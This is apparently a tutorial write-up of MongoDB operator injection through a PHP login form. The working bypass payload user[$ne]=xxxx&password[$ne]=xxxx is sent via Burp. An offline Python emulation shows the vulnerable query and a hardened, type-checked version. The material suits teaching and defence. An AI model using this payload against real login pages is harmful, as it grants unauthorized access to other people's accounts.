Example 1

Here I have a vulnerable login page.

Here we can use operator-based injection. If the query becomes ['user' => ['$ne' => 'xxxx']] (MongoDB's $ne operator, "not equal"), the database returns every document whose user field is NOT xxxx, instead of the one document whose user equals what we typed. We can do the same for the password field, so the query matches any account whose password is anything other than xxxx.

But if we have to pass it as a POST request via PHP, the syntax changes a little: PHP turns a parameter name written with square brackets into a nested array in $_POST, so an operator can be smuggled in through the parameter name itself.

In the given login page we will use user[$ne]=xxxx and the same for the password field. PHP then populates $_POST['user'] with ['$ne' => 'xxxx'], and an application that passes $_POST['user'] straight into the query ends up building exactly the operator query above.

I ran Burp Proxy and intercepted the POST request sent by the login form. I altered the two parameters as follows.

After that I forwarded the request and was logged in as admin. Note that the account you land in is simply the first matching document the database hands back, so on another target it may not be admin.
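To make the whole chain concrete (the bracketed parameter name, PHP's nested-array parsing, the $ne query, and why the login succeeds), here is an added worked example that is not part of the original write-up. It is Python, not the PHP of the real login page: it re-implements a minimal version of PHP's $_POST parsing and of MongoDB's $ne matching so it runs offline with no database. The user collection, the request and the function names (php_post, vulnerable_login, hardened_login) are all constructed for illustration.

```python
"""Emulation of MongoDB operator injection through a PHP login form.

Constructed example: PHP's $_POST parsing and MongoDB's $ne matching are
re-implemented minimally here so the whole flow runs offline.
"""
from urllib.parse import parse_qsl

# Constructed sample collection standing in for the users collection.
USERS = [
    {"user": "admin", "password": "S3cr3t!"},
    {"user": "bob", "password": "hunter2"},
]

# Constructed copy of the intercepted request after editing it in Burp;
# the form originally sent user=admin&password=guess.
FORGED_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "\r\n"
    "user[$ne]=xxxx&password[$ne]=xxxx"
)


def request_body(raw: str) -> str:
    """Return the body of a raw HTTP request (everything after the blank line)."""
    return raw.split("\r\n\r\n", 1)[1]


def php_post(body: str) -> dict:
    """Parse a form body the way PHP fills $_POST: a bracketed name such as
    user[$ne]=xxxx becomes the nested array ['user' => ['$ne' => 'xxxx']].
    One level of nesting is enough for this attack, so that is all we model."""
    post: dict = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if "[" in name and name.endswith("]"):
            outer, inner = name[:-1].split("[", 1)
            post.setdefault(outer, {})[inner] = value
        else:
            post[name] = value
    return post


def field_matches(stored, criterion) -> bool:
    """Minimal MongoDB matcher: a plain value means equality, a dict holding
    $ne means 'not equal'. Any other operator is rejected so the emulation
    does not pretend to support more than it does."""
    if isinstance(criterion, dict):
        if set(criterion) != {"$ne"}:
            raise ValueError(f"unsupported operator(s): {sorted(criterion)}")
        return stored != criterion["$ne"]
    return stored == criterion


def find_one(collection, query):
    """Like findOne(): the first document matching every query field, or None."""
    for doc in collection:
        if all(field_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def vulnerable_login(body: str):
    """Mirrors findOne(['user' => $_POST['user'], 'password' => $_POST['password']])
    with no type check: whatever PHP parsed is passed straight into the query,
    so an injected array becomes an operator."""
    post = php_post(body)
    return find_one(USERS, {"user": post["user"], "password": post["password"]})


def hardened_login(body: str):
    """Same query, but each credential must be a plain string; an array
    (i.e. a smuggled operator) is rejected before it reaches the database."""
    post = php_post(body)
    user, password = post.get("user"), post.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"user": user, "password": password})


if __name__ == "__main__":
    body = request_body(FORGED_REQUEST)
    print("parsed $_POST:", php_post(body))
    print("vulnerable login returns:", vulnerable_login(body))
    print("hardened login returns:", hardened_login(body))
```

The vulnerable path logs in as admin only because admin happens to be the first document that satisfies "user is not xxxx and password is not xxxx"; the hardened path rejects the request because $_POST['user'] arrived as an array rather than a string, which is the check to add (or, equivalently, casting both values to strings before they reach the query).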
